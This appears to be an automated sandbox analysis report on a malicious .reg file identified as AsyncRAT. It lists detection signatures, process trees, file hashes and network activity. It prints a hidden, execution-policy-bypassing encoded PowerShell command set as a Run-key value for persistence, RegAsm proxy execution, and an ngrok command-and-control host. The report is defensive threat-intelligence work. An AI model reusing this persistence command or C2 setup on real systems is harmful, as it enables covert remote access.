Analysis Overview
SHA256
cf6c2c3495096544c6957276ee7dfea94f4a6efbe9b94d36df73cd6bf14da39c
Threat Level: Known bad
The file YjJqp0O3NZzC.reg was found to be: Known bad.
Malicious Activity Summary
AsyncRat
Asyncrat family
Async RAT payload
System Binary Proxy Execution: Regsvcs/Regasm
Command and Scripting Interpreter: PowerShell
Executes dropped EXE
Adds Run key to start application
Legitimate hosting services abused for malware hosting/C2
System Location Discovery: System Language Discovery
Suspicious use of WriteProcessMemory
Runs .reg file with regedit
Suspicious behavior: GetForegroundWindowSpam
Suspicious use of SendNotifyMessage
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious behavior: EnumeratesProcesses
Runs regedit.exe
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-11-07 21:54
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-11-07 21:54
Reported
2024-11-07 21:57
Platform
win7-20240903-en
Max time kernel
129s
Max time network
127s
Command Line
Signatures
AsyncRat
Asyncrat family
Async RAT payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
System Binary Proxy Execution: Regsvcs/Regasm
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Local\Temp\RegAsm.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Custom\RegAsm.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RegAsm.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Windows\CurrentVersion\Run\N/A = "powershell -WindowStyle Hidden -ExecutionPolicy Bypass -EncodedCommand [base64 blob removed]" | C:\Windows\regedit.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | 4.tcp.eu.ngrok.io | N/A | N/A |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\RegAsm.exe | N/A |
Runs .reg file with regedit
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\regedit.exe | N/A |
Runs regedit.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\regedit.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\WINDOWS\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskmgr.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskmgr.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskmgr.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskmgr.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskmgr.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskmgr.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskmgr.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskmgr.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskmgr.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskmgr.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskmgr.exe | N/A |
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\regedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskmgr.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\WINDOWS\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskmgr.exe | N/A |
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of WriteProcessMemory
Processes
C:\Windows\regedit.exe
regedit.exe "C:\Users\Admin\AppData\Local\Temp\YjJqp0O3NZzC.reg"
C:\Windows\regedit.exe
"C:\Windows\regedit.exe"
C:\WINDOWS\system32\WindowsPowerShell\v1.0\powershell.exe
"C:\WINDOWS\system32\WindowsPowerShell\v1.0\powershell.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -ExecutionPolicy Bypass -EncodedCommand [base64 blob removed]
C:\Users\Admin\AppData\Local\Temp\RegAsm.exe
"C:\Users\Admin\AppData\Local\Temp\RegAsm.exe"
C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /4
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 4.tcp.eu.ngrok.io | udp |
| DE | 18.198.77.177:2024 | 4.tcp.eu.ngrok.io | tcp |
Files
memory/2372-0-0x0000000000210000-0x0000000000211000-memory.dmp
memory/2372-1-0x0000000000210000-0x0000000000211000-memory.dmp
memory/2572-6-0x000000001B610000-0x000000001B8F2000-memory.dmp
memory/2572-7-0x0000000001F60000-0x0000000001F68000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
| MD5 | 9df5ee3447038ee28808dabdc7e97ec0 |
| SHA1 | f464a8ba5c957a25de36760014bc752d5ae40b08 |
| SHA256 | c0a444a016a834136ac90be99039ba5af759256f2c32b74c0ce544459e59a321 |
| SHA512 | 453906ac10176c3e9a6e60b0b5d9e8f99cc0212259b9790e171b5d66f809b0feaab9a013b603c4ef9f6ea6a78efacdf57226b64ea2916df4a0839f587e1c504f |
C:\Users\Admin\AppData\Local\Temp\RegAsm.exe
| MD5 | af59d42f6526cfabf0f502f8e83209f9 |
| SHA1 | 6505f4560261dedfae55dc4a5b712802ffb2eed6 |
| SHA256 | f1a47699ad8f48d7cf68f5db51364433ac8695cc6d2149d26dbf20b9af31bf4f |
| SHA512 | f3fc5ee9df8454ee8abce013a1672fdf01c5a5d08d88e6221c169d3a31d43dbaf50e7bdbbe54e8bb8453f5367d12f016cb834ec6efed363c8f8018cd11e4a646 |
memory/2856-19-0x0000000000AC0000-0x0000000000AD2000-memory.dmp
memory/868-20-0x0000000140000000-0x00000001405E8000-memory.dmp
memory/868-21-0x0000000140000000-0x00000001405E8000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2024-11-07 21:54
Reported
2024-11-07 21:55
Platform
win10v2004-20241007-en
Max time kernel
2s
Max time network
4s
Command Line
Signatures
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\N/A = "powershell -WindowStyle Hidden -ExecutionPolicy Bypass -EncodedCommand [base64 blob removed]" | C:\Windows\regedit.exe | N/A |
Runs .reg file with regedit
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\regedit.exe | N/A |
Processes
C:\Windows\regedit.exe
regedit.exe "C:\Users\Admin\AppData\Local\Temp\YjJqp0O3NZzC.reg"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 241.150.49.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 77.190.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |